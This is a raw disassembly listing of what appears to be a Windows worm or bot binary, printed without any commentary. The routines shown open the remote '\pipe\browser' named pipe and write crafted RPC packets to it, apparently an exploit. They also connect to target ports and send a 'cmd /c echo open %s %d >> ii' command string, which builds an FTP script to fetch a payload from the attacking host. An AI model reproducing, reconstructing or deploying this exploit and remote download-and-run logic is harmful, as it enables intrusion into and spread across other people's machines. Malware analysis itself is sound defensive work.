cmp byte ptr [eax], 0FFh
jz short loc_40DF80
push dword ptr [esi+4]
mov ecx, esi
call sub_40E11B
dec byte ptr [eax]
jmp short loc_40DF92
; ---------------------------------------------------------------------------
loc_40DF80: ; CODE XREF: sub_40DF46+1B�j
; sub_40DF46+2A�j
mov eax, [esi+0Ch]
mov ecx, esi
inc eax
inc eax
push eax
mov eax, [esi+4]
dec eax
push eax
call sub_40E123
loc_40DF92: ; CODE XREF: sub_40DF46+A�j
; sub_40DF46+11�j ...
mov [esi+4], ebx
mov [esi+8], ebx
mov [esi+0Ch], ebx
pop esi
pop ebx
retn 4
sub_40DF46 endp
; =============== S U B R O U T I N E =======================================
sub_40DFA0 proc near ; CODE XREF: sub_40DE4D+14�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
push [esp+8+arg_4]
mov esi, ecx
call sub_40DE9A
test al, al
jz short loc_40DFD0
push [esp+4+arg_4]
push [esp+8+arg_0]
push dword ptr [esi+4]
call sub_40DD52
add esp, 0Ch
mov ecx, esi
push [esp+4+arg_4]
call sub_40DE6A
loc_40DFD0: ; CODE XREF: sub_40DFA0+10�j
mov eax, esi
pop esi
retn 8
sub_40DFA0 endp
; =============== S U B R O U T I N E =======================================
sub_40DFD6 proc near ; CODE XREF: sub_40DD57+3E�p
; sub_40DD57+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_40DFE9
call sub_43A760
loc_40DFE9: ; CODE XREF: sub_40DFD6+C�j
mov ecx, edi
call sub_40E130
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_40DFFF
mov ebx, eax
loc_40DFFF: ; CODE XREF: sub_40DFD6+25�j
test ebx, ebx
jbe short loc_40E033
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_40E03B
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_40DE9A
test al, al
jz short loc_40E033
push esi
mov ecx, edi
call sub_40DE6A
loc_40E033: ; CODE XREF: sub_40DFD6+2B�j
; sub_40DFD6+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_40DFD6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40E03B proc near ; CODE XREF: sub_40DFD6+3A�p
jmp sub_420840
sub_40E03B endp
; =============== S U B R O U T I N E =======================================
sub_40E040 proc near ; CODE XREF: sub_40DE9A+5�p
; sub_40E056+1E�p
call sub_40E16F
cmp eax, 2
ja short loc_40E04E
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40E040+8�j
add eax, 0FFFFFFFEh
retn
sub_40E040 endp
; =============== S U B R O U T I N E =======================================
sub_40E052 proc near ; CODE XREF: sub_40DD57+A5�p
mov eax, [ecx+0Ch]
retn
sub_40E052 endp
; =============== S U B R O U T I N E =======================================
sub_40E056 proc near ; CODE XREF: sub_40DE9A+99�p
mov eax, offset loc_43B854
call sub_420820
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
or edi, 1Fh
call sub_40E040
cmp eax, edi
jnb short loc_40E080
mov edi, [ebp+8]
loc_40E080: ; CODE XREF: sub_40E056+25�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
push 0
push eax
mov ecx, esi
call sub_40E15F
mov [ebp+8], eax
jmp short loc_40E0B9
; ---------------------------------------------------------------------------
loc_40E096: ; DATA XREF: _1:0043E3AC�o
mov eax, [ebp+8]
mov ecx, [ebp-14h]
mov [ebp-18h], eax
add eax, 2
push 0
push eax
call sub_40E15F
mov [ebp+8], eax
mov eax, offset loc_40E0B3
retn
; ---------------------------------------------------------------------------
loc_40E0B3: ; DATA XREF: sub_40E056+57�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_40E0B9: ; CODE XREF: sub_40E056+3E�j
mov eax, [esi+8]
or dword ptr [ebp-4], 0FFFFFFFFh
test eax, eax
jbe short loc_40E0DB
cmp eax, edi
jbe short loc_40E0CA
mov eax, edi
loc_40E0CA: ; CODE XREF: sub_40E056+70�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_40DD52
add esp, 0Ch
loc_40E0DB: ; CODE XREF: sub_40E056+6C�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_40DF46
mov eax, [ebp+8]
mov ecx, esi
inc eax
push eax
mov [esi+4], eax
call sub_40E11B
and byte ptr [eax], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_40E102
mov edi, ebx
loc_40E102: ; CODE XREF: sub_40E056+A8�j
push edi
mov ecx, esi
call sub_40DE6A
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40E056 endp
; =============== S U B R O U T I N E =======================================
sub_40E11B proc near ; CODE XREF: sub_40DD57+6A�p
; sub_40DD57+B2�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
retn 4
sub_40E11B endp
; =============== S U B R O U T I N E =======================================
sub_40E123 proc near ; CODE XREF: sub_40DF46+47�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_420B80
pop ecx
retn 8
sub_40E123 endp
; =============== S U B R O U T I N E =======================================
sub_40E130 proc near ; CODE XREF: sub_40DFD6+15�p
push esi
mov esi, ecx
push edi
mov edi, [esi+4]
test edi, edi
jz short loc_40E15C
push edi
call sub_40E11B
mov al, [eax]
test al, al
jz short loc_40E15C
cmp al, 0FFh
jz short loc_40E15C
push 1
mov ecx, esi
call sub_40DF46
push edi
mov ecx, esi
call sub_40DE4D
loc_40E15C: ; CODE XREF: sub_40E130+9�j
; sub_40E130+15�j ...
pop edi
pop esi
retn
sub_40E130 endp
; =============== S U B R O U T I N E =======================================
sub_40E15F proc near ; CODE XREF: sub_40E056+36�p
; sub_40E056+4F�p
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40E176
pop ecx
pop ecx
retn 8
sub_40E15F endp
; =============== S U B R O U T I N E =======================================
sub_40E16F proc near ; CODE XREF: sub_40E040�p
or eax, 0FFFFFFFFh
retn
sub_40E16F endp
; =============== S U B R O U T I N E =======================================
sub_40E173 proc near ; CODE XREF: sub_40DD57+78�p
mov al, 1
retn
sub_40E173 endp
; =============== S U B R O U T I N E =======================================
sub_40E176 proc near ; CODE XREF: sub_40E15F+6�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jge short loc_40E180
xor eax, eax
loc_40E180: ; CODE XREF: sub_40E176+6�j
push eax
call sub_420C30
pop ecx
retn
sub_40E176 endp
; =============== S U B R O U T I N E =======================================
sub_40E188 proc near ; CODE XREF: _0:loc_40DBC6�p
; sub_43A8A0+3�p
test ds:byte_4F369C, 1
jnz short locret_40E198
or ds:byte_4F369C, 1
locret_40E198: ; CODE XREF: sub_40E188+7�j
retn
sub_40E188 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40E19A proc near ; DATA XREF: _2:0043F00C�o
jmp $+5
sub_40E19A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E19F proc near
mov eax, ds:dword_449074
add eax, 6
mov ds:dword_4E5CDC, eax
retn
sub_40E19F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E1AD proc near ; CODE XREF: sub_40E1AD+D0�p
; sub_40E29B+465�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_40E1C1
or [ebp+arg_7], 1
jmp short loc_40E1C5
; ---------------------------------------------------------------------------
loc_40E1C1: ; CODE XREF: sub_40E1AD+C�j
and [ebp+arg_7], 0FEh
loc_40E1C5: ; CODE XREF: sub_40E1AD+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_40E1E9
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_40E1FB
; ---------------------------------------------------------------------------
loc_40E1E9: ; CODE XREF: sub_40E1AD+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_40E1FB: ; CODE XREF: sub_40E1AD+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_41BE40
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_40E294
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_41FBF0
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jz short loc_40E28B
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_40E28B
push [ebp+arg_20]
call sub_41C9D0
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_40E287
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_40E1AD
add esp, 2Ch
jmp short loc_40E296
; ---------------------------------------------------------------------------
loc_40E287: ; CODE XREF: sub_40E1AD+B3�j
mov al, 1
jmp short loc_40E296
; ---------------------------------------------------------------------------
loc_40E28B: ; CODE XREF: sub_40E1AD+9C�j
; sub_40E1AD+A4�j
push [ebp+arg_20]
call sub_41C9D0
pop ecx
loc_40E294: ; CODE XREF: sub_40E1AD+61�j
xor al, al
loc_40E296: ; CODE XREF: sub_40E1AD+D8�j
; sub_40E1AD+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E1AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E29B proc near ; CODE XREF: _0:0040E88D�p
var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
var_20DC = byte ptr -20DCh
var_DC = byte ptr -0DCh
var_C8 = dword ptr -0C8h
var_BC = byte ptr -0BCh
var_B8 = byte ptr -0B8h
var_B7 = byte ptr -0B7h
var_B6 = byte ptr -0B6h
var_B5 = byte ptr -0B5h
var_B4 = dword ptr -0B4h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = dword ptr -0ACh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = word ptr -9Ch
var_9A = byte ptr -9Ah
var_98 = byte ptr -98h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = qword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = qword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 60DCh
call sub_41EF80
push ebx
push esi
push edi
push offset dword_449078
push [ebp+arg_0]
call sub_420F10
pop ecx
xor ebx, ebx
test eax, eax
pop ecx
mov esi, 2000h
jz short loc_40E30F
push [ebp+arg_0]
lea eax, [ebp+var_20DC]
push offset dword_44907C
push esi
push eax
call sub_41EC30
push 20h
lea eax, [ebp+var_DC]
push ebx
push eax
call sub_41E4B0
add esp, 1Ch
lea eax, [ebp+var_20DC]
mov [ebp+var_C8], eax
lea eax, [ebp+var_DC]
push ebx
push offset byte_4E5CE0
push offset byte_4E5CE1
push eax
call sub_43A936
loc_40E30F: ; CODE XREF: sub_40E29B+28�j
push [ebp+arg_0]
lea eax, [ebp+var_40DC]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push esi
push eax
call sub_41EC30
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call ds:off_4F53C0
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_40E353
loc_40E34C: ; CODE XREF: sub_40E29B+25F�j
; sub_40E29B+361�j ...
xor al, al
jmp loc_40E78F
; ---------------------------------------------------------------------------
loc_40E353: ; CODE XREF: sub_40E29B+AF�j
push 48h
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_41E4B0
push 10h
xor edi, edi
pop eax
inc edi
mov [ebp+var_B4], eax
push eax
lea eax, [ebp+var_98]
push offset dword_44909C
push eax
mov [ebp+var_B8], 5
mov [ebp+var_B7], bl
mov [ebp+var_B6], 0Bh
mov [ebp+var_B5], 3
mov [ebp+var_B0], 48h
mov [ebp+var_AE], bx
mov [ebp+var_AC], ebx
mov [ebp+var_A8], 10B8h
mov [ebp+var_A6], 10B8h
mov [ebp+var_A4], ebx
mov [ebp+var_A0], edi
mov [ebp+var_9C], bx
mov [ebp+var_9A], 1
call sub_41FBF0
push 10h
lea eax, [ebp+var_84]
push offset dword_4490B0
push eax
mov [ebp+var_88], 3
call sub_41FBF0
add esp, 24h
lea eax, [ebp+var_BC]
mov [ebp+var_74], 2
push ebx
push eax
lea eax, [ebp+var_B8]
push 48h
push eax
push [ebp+var_4]
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jz loc_40E4F1
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push esi
push eax
push [ebp+var_4]
call ds:off_4F53BC
push ebx
call sub_420D80
push eax
call sub_41EB60
push 14h
lea eax, [ebp+var_70]
push 41h
push eax
call sub_41E4B0
push 1Ch
lea eax, [ebp+var_30]
push 41h
push eax
call sub_41E4B0
add esp, 20h
call sub_41EB70
mov esi, [ebp+arg_4]
mov [ebp+var_70], eax
mov [ebp+var_64], edi
mov [ebp+var_68], ebx
lea esi, [esi+esi*4]
mov [ebp+var_6C], edi
shl esi, 2
mov [ebp+var_60], bx
mov [ebp+var_28], ebx
cmp ds:byte_44905C[esi], bl
jz short loc_40E49D
push 4
mov [ebp+var_24], edi
mov [ebp+var_2C], edi
push offset dword_4E5CE4
jmp short loc_40E4AD
; ---------------------------------------------------------------------------
loc_40E49D: ; CODE XREF: sub_40E29B+1F1�j
push 2
pop eax
push 4
mov [ebp+var_24], eax
mov [ebp+var_2C], eax
push offset loc_4490C4
loc_40E4AD: ; CODE XREF: sub_40E29B+200�j
lea eax, [ebp+var_20]
push eax
call sub_41FBF0
add esp, 0Ch
call sub_41EB70
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call sub_41EB70
cdq
idiv edi
mov eax, ds:dword_449050[esi]
mov [ebp+var_18], ebx
push eax
mov [ebp+arg_0], eax
inc edx
mov [ebp+var_1C], edx
call sub_41BE40
mov edi, eax
pop ecx
cmp edi, ebx
jnz short loc_40E4FF
loc_40E4F1: ; CODE XREF: sub_40E29B+185�j
push [ebp+var_4]
call ds:off_4F533C
jmp loc_40E34C
; ---------------------------------------------------------------------------
loc_40E4FF: ; CODE XREF: sub_40E29B+254�j
mov eax, [ebp+arg_0]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_41E4B0
mov eax, [ebp+arg_0]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_41E4B0
mov eax, ds:dword_449058[esi]
push 7
add eax, edi
push offset dword_449010
push eax
mov [ebp+arg_4], eax
call sub_41FBF0
mov eax, [ebp+arg_4]
push 15Ch
add eax, 7
push offset dword_448EB0
push eax
call sub_41FBF0
mov eax, ds:dword_449054[esi]
add esp, 30h
mov [ebp+arg_4], eax
add eax, edi
cmp ds:byte_44905C[esi], bl
jz short loc_40E5B0
push 4
push offset dword_4E5CDC
push eax
call sub_41FBF0
add [ebp+arg_4], 0Ch
mov esi, offset dword_449074
mov eax, [ebp+arg_4]
push 4
add eax, edi
push esi
push eax
call sub_41FBF0
mov eax, [ebp+arg_4]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp+arg_4], eax
call sub_41FBF0
mov eax, [ebp+arg_4]
push 4
add eax, 0Ch
push esi
push eax
call sub_41FBF0
add esp, 30h
jmp short loc_40E5D6
; ---------------------------------------------------------------------------
loc_40E5B0: ; CODE XREF: sub_40E29B+2C8�j
mov [ebp+arg_4], eax
mov [ebp+var_8], 10h
mov esi, offset dword_449074
loc_40E5BF: ; CODE XREF: sub_40E29B+339�j
push 4
push esi
push [ebp+arg_4]
call sub_41FBF0
add [ebp+arg_4], 4
add esp, 0Ch
dec [ebp+var_8]
jnz short loc_40E5BF
loc_40E5D6: ; CODE XREF: sub_40E29B+313�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
call sub_41BE40
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_8], esi
jnz short loc_40E601
push [ebp+var_4]
call ds:off_4F533C
push edi
call sub_41C9D0
pop ecx
jmp loc_40E34C
; ---------------------------------------------------------------------------
loc_40E601: ; CODE XREF: sub_40E29B+34F�j
mov eax, [ebp+arg_0]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_41E4B0
lea eax, [ebp+var_70]
push 14h
push eax
push esi
call sub_41FBF0
mov eax, [ebp+arg_0]
mov [ebp-0Ch], ebx
mov dword ptr [ebp+var_14+4], eax
add esp, 10h
fild [ebp+var_14+4]
fmul ds:flt_43C48C
fstp [esp+14h+var_14]
call sub_420210
call sub_4201DC
push [ebp+arg_0]
mov [esi+1Ch], eax
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
mov [esi+18h], ebx
call sub_41FBF0
mov eax, [ebp+arg_0]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp+arg_4], eax
jz short loc_40E66B
loc_40E663: ; CODE XREF: sub_40E29B+3CB�j
inc eax
test al, 3
jnz short loc_40E663
mov [ebp+arg_4], eax
loc_40E66B: ; CODE XREF: sub_40E29B+3C6�j
lea ecx, [ebp+var_30]
push 1Ch
add eax, esi
push ecx
push eax
call sub_41FBF0
add [ebp+arg_4], 1Ch
push edi
call sub_41C9D0
push 18h
lea eax, [ebp+var_48]
push ebx
push eax
call sub_41E4B0
push 14h
lea eax, [ebp+var_5C]
push ebx
push eax
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov word ptr [ebp+var_38+4], bx
mov word ptr [ebp+var_38+6], 1Fh
call sub_41E4B0
add esp, 28h
push ebx
push ebx
push 1
push ebx
call ds:dword_4F53B8 ; CreateEventA
mov [ebp+var_4C], eax
mov byte ptr [ebp+arg_0+3], bl
mov [ebp-0Ch], ebx
loc_40E6D8: ; CODE XREF: sub_40E29B+4C7�j
cmp dword ptr [ebp-0Ch], 2
jge loc_40E76D
push 1
push 10B8h
push [ebp+arg_4]
inc dword ptr [ebp-0Ch]
push esi
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+var_4]
rep movsd
call sub_40E1AD
add esp, 2Ch
test al, al
jz short loc_40E76A
cmp [ebp+var_4C], ebx
jz short loc_40E75C
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+var_4]
call ds:off_4F53BC
test eax, eax
jnz short loc_40E743
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_40E34C
loc_40E743: ; CODE XREF: sub_40E29B+495�j
push 3E8h
push [ebp+var_4C]
call ds:dword_4F5374 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40E75C
mov byte ptr [ebp+arg_0+3], 1
loc_40E75C: ; CODE XREF: sub_40E29B+474�j
; sub_40E29B+4BB�j
cmp byte ptr [ebp+arg_0+3], bl
mov esi, [ebp+var_8]
jz loc_40E6D8
jmp short loc_40E76D
; ---------------------------------------------------------------------------
loc_40E76A: ; CODE XREF: sub_40E29B+46F�j
mov esi, [ebp+var_8]
loc_40E76D: ; CODE XREF: sub_40E29B+441�j
; sub_40E29B+4CD�j
push [ebp+var_4]
mov edi, ds:off_4F533C
call edi ; sub_50B3D5
push esi
call sub_41C9D0
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_40E789
push [ebp+var_4C]
call edi ; sub_50B3D5
loc_40E789: ; CODE XREF: sub_40E29B+4E7�j
cmp byte ptr [ebp+arg_0+3], bl
setnz al
loc_40E78F: ; CODE XREF: sub_40E29B+B3�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E29B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E794 proc near ; CODE XREF: _0:0040E8AB�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_4F5528 ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4F552C ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F553C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40E862
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40E862
mov edi, 400h
push esi
mov esi, ds:dword_4F5534
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_43F0FC
push eax
push eax
push ds:dword_4E2D00
push [ebp+arg_0]
call sub_40AEAD
pop ecx
push eax
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41EC30
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_4F5540 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E866
loc_40E862: ; CODE XREF: sub_40E794+50�j
; sub_40E794+62�j
xor eax, eax
jmp short loc_40E87D
; ---------------------------------------------------------------------------
loc_40E866: ; CODE XREF: sub_40E794+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_4F5538 ; closesocket
xor eax, eax
inc eax
loc_40E87D: ; CODE XREF: sub_40E794+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E794 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
xor ebx, ebx
loc_40E887: ; CODE XREF: _0:0040E8CD�j
lea eax, [esp+14h]
push ebx
push eax
call sub_40E29B
pop ecx
test al, al
pop ecx
jz short loc_40E8BA
push 65h
lea esi, [esp+14h]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E794
add esp, 0C0h
test eax, eax
jnz short loc_40E8CF
loc_40E8BA: ; CODE XREF: _0:0040E896�j
test ebx, ebx
jnz short loc_40E8C9
push 7D0h
call ds:dword_4F534C ; Sleep
loc_40E8C9: ; CODE XREF: _0:0040E8BC�j
inc ebx
cmp ebx, 2
jb short loc_40E887
loc_40E8CF: ; CODE XREF: _0:0040E8B8�j
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E8D6 proc near ; CODE XREF: sub_40E9ED+91�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call ds:dword_4F5528 ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4F552C ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F553C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40E9A4
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40E9A4
mov edi, 400h
push esi
mov esi, ds:dword_4F5534
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset byte_43F0FC
push eax
push eax
push ds:dword_4E2D00
push [ebp+arg_0]
call sub_40AEAD
pop ecx
push eax
push offset aCmdCEchoOpen_1 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+var_1A0]
push 190h
push eax
call sub_41EC30
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call ds:dword_4F5540 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E9A8
loc_40E9A4: ; CODE XREF: sub_40E8D6+50�j
; sub_40E8D6+62�j
xor eax, eax
jmp short loc_40E9BF
; ---------------------------------------------------------------------------
loc_40E9A8: ; CODE XREF: sub_40E8D6+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_4F5538 ; closesocket
xor eax, eax
inc eax
loc_40E9BF: ; CODE XREF: sub_40E8D6+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E8D6 endp
; ---------------------------------------------------------------------------
push dword ptr [esp+4]
call ds:dword_4F5528 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40E9EC
push dword ptr [esp+4]
call ds:dword_4F5550 ; gethostbyname
test eax, eax
jnz short loc_40E9E5
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40E9E5: ; CODE XREF: _0:0040E9DF�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40E9EC: ; CODE XREF: _0:0040E9D1�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9ED proc near ; CODE XREF: sub_40C87D+1D7�p
; DATA XREF: _2:off_4481F4�o
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+arg_4]
push edi
push eax
mov [ebp+var_10], 2
call ds:dword_4E3008 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_C], eax
call ds:dword_4E2FC8 ; htons
push 6
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_4F553C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EA5F
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EA40
push esi
jmp short loc_40EA59
; ---------------------------------------------------------------------------
loc_40EA40: ; CODE XREF: sub_40E9ED+4E�j
push 0
push 1213h
push offset dword_449148
push esi
call ds:dword_4F5540 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40EA63
loc_40EA59: ; CODE XREF: sub_40E9ED+51�j
call ds:dword_4F5538 ; closesocket
loc_40EA5F: ; CODE XREF: sub_40E9ED+3C�j
xor eax, eax
jmp short loc_40EAA1
; ---------------------------------------------------------------------------
loc_40EA63: ; CODE XREF: sub_40E9ED+6A�j
call ds:dword_4F5538 ; closesocket
push 216Bh
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E8D6
add esp, 0C0h
test eax, eax
jz short loc_40EA9E
mov eax, [ebp+arg_A8]
shl eax, 6
lea eax, dword_4481F8[eax]
inc dword ptr [eax]
loc_40EA9E: ; CODE XREF: sub_40E9ED+9E�j
xor eax, eax
inc eax
